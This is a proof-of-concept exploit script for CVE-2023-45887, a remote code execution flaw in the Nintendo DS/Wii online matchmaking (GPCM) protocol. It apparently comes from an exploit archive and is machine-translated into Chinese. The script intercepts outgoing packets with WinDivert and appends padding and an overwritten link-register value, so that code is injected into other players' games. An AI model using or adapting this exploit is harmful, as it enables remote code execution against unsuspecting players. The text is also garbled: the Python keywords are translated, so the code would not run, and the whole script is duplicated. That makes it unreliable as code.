#利用标题: DS无线通信远程代码执行
#Date: 2023年10月11日
#利用作者: Mikeisastar
#供应商homepage: https://www.nintendo.com
#版本:未知
#在: Wii上测试
#CVE: CVE-2023-45887
''该代码将任意代码注入客户的游戏。
您对使用此代码时发生的所有活动完全负责。
本守则的作者对您或其他任何人都不承担任何责任
该代码使用造成的损害的结果。
'''
导入
导入系统
TRY:
导入pydivert
除ModulenotFoundError:外
sys.exit(“未安装'pydivert”模块!')
#变量
lr_save=b'\ x41 \ x41 \ x41 \ x41 \ x41'
assert len(lr_save)==0x04
填充=b'mikestar'
断言Len(填充)0x00
#常数
dwc_match_command_invalid=b'\ xfe'
padding_length=0x23c
final_key=b'\\ final \\'
windivert_filter='出口和tcp和tcp.paylathength 0'
def try_modify_payload(有效载荷):
Message_pattern=rb'\\ msg \\ gpcm([1-9] [0-9]?)vmat'
消息=re.Search(Message_pattern,有效载荷)
如果不是消息:
没有返回
有效载荷=有效载荷[:message.end()]
有效载荷+=dwc_match_command_invalid
有效载荷+=(填充*(padding_length //len(padding) + 1))[
adding_length]
有效载荷+=lr_save
有效载荷+=final_key
退回有效载荷
def main():
TRY:
用Pydivert.Windivevert(Windivert_filter)作为Packet_buffer:
对于packet_buffer:中的数据包
有效载荷=try_modify_payload(packet.payload)
如果有效载荷不是没有:
打印(“修改了GPCM消息!”)
packet.payload=有效载荷
packet_buffer.send(数据包)
除了键盘Interrupt:
经过
除CortermissirError:
sys.exit(“该程序必须具有管理员特权!”)
如果name=='__ -Main __':
主要的()
#Date: 2023年10月11日
#利用作者: Mikeisastar
#供应商homepage: https://www.nintendo.com
#版本:未知
#在: Wii上测试
#CVE: CVE-2023-45887
''该代码将任意代码注入客户的游戏。
您对使用此代码时发生的所有活动完全负责。
本守则的作者对您或其他任何人都不承担任何责任
该代码使用造成的损害的结果。
'''
导入
导入系统
TRY:
导入pydivert
除ModulenotFoundError:外
sys.exit(“未安装'pydivert”模块!')
#变量
lr_save=b'\ x41 \ x41 \ x41 \ x41 \ x41'
assert len(lr_save)==0x04
填充=b'mikestar'
断言Len(填充)0x00
#常数
dwc_match_command_invalid=b'\ xfe'
padding_length=0x23c
final_key=b'\\ final \\'
windivert_filter='出口和tcp和tcp.paylathength 0'
def try_modify_payload(有效载荷):
Message_pattern=rb'\\ msg \\ gpcm([1-9] [0-9]?)vmat'
消息=re.Search(Message_pattern,有效载荷)
如果不是消息:
没有返回
有效载荷=有效载荷[:message.end()]
有效载荷+=dwc_match_command_invalid
有效载荷+=(填充*(padding_length //len(padding) + 1))[
adding_length]有效载荷+=lr_save
有效载荷+=final_key
退回有效载荷
def main():
TRY:
用Pydivert.Windivevert(Windivert_filter)作为Packet_buffer:
对于packet_buffer:中的数据包
有效载荷=try_modify_payload(packet.payload)
如果有效载荷不是没有:
打印(“修改了GPCM消息!”)
packet.payload=有效载荷
packet_buffer.send(数据包)
除了键盘Interrupt:
经过
除CortermissirError:
sys.exit(“该程序必须具有管理员特权!”)
如果name=='__ -Main __':
主要的()
